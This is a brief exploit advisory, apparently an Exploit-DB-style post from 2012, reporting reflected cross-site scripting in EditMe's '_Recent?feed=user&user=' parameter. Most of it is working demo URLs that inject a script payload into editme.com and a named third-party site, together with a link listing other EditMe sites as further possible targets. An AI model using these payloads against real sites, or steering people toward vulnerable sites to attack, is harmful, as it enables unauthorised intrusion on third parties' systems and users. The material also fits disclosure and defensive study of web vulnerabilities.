# Exploit Title: EditMe Cross Site Scripting # Date: 4.03.2012 # Author: Sony # Software Link: http://www.editme.com/ # Web Browser : Mozilla Firefox # Blog : http://st2tea.blogspot.com # PoC: http://st2tea.blogspot.com/2012/03/editme-cross-site-scripting.html .................................................................. /_Recent?feed=user&user=[our xss is here] Demo: http://www.editme.com/_Recent?feed=user&user=%3Cscript%3Ealert%28%22EditMe%20Cross%20Site%20Scripting%22%29%3C/script%3E http://3.bp.blogspot.com/-ZXYKrYpy7z8/T1MksAcl1LI/AAAAAAAAAr8/ayezykYyDWs/s1600/editme1.JPG http://www.governmentcloudcomputing.info/_Recent?feed=user&user=%3Cscript%3Ealert%28%22EditMe%20Cross%20Site%20Scripting%22%29%3C/script%3E http://2.bp.blogspot.com/-5lUI4Vkf__c/T1MkxjmihtI/AAAAAAAAAsI/wdkg1jNmQcQ/s1600/editme2.JPG Who use EditMe? http://www.editme.com/EditMeSites